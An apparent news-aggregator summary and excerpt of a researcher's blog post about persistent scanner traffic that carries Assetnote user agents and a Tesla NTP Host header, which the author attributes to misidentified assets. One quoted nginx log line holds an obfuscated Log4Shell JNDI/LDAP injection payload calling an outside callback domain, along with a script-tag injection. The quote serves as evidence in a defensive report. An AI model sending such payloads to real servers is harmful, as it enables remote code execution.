I'm being cyberattacked by Tesla, Inc
A researcher reports receiving persistent cyberattack traffic from scanners associated with Assetnote, a threat exposure management firm. The author speculates that the firm's automated tools incorrectly identified their machine as a Tesla asset due to a CNAME configuration in the NTP pool.
Why it matters
It highlights the risks of automated security scanning tools misidentifying assets and inadvertently targeting innocent third-party infrastructure.
While it’s not unusual for everything on the dark dungeons of the IPv4 Internet to be subject to a barrage of drive-by scanner traffic and the occasional bizarrely persistent attacker, I noticed something strange while looking through my nginx logs. Persistent attack traffic coming from three particular IPs, with the strange thing being that they were arriving with Host or Referer headers from pool-ntp.tesla.com , carried Assetnote user agents, and were trying to SSRF me to Assetnote callback URLs:
35.168.63.24 - - [13/Sep/2026:01:14:31 -0700] "GET /?a=%3Cscript%20src=${jndi${:-:}ldap${:-:}//waf6.${date:MM-dd-yyyy}.pool-ntp.tesla.com.log4j.assetnote-callback.com/}>alert()%3C%2Fscript%3E HTTP/1.1" 299 817 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 ${jndi${:-:}ldap${:-:}//waf6.${date:MM-dd-yyyy}.pool-ntp.tesla.com.log4j.assetnote-callback.com/}" host=pool-ntp.tesla.com The traffic came from three specific scanners: 54.165.75.96 , 35.168.63.24 , and 52.44.200.251 . All of those are in the Amazon Web Services AS (AMAZON-AES).
Get smarter about the news
Sign up free for a feed built around what you actually care about, Dive Deeper research on any story, and the full text of every article.
Create free accountAlready have an account? Sign in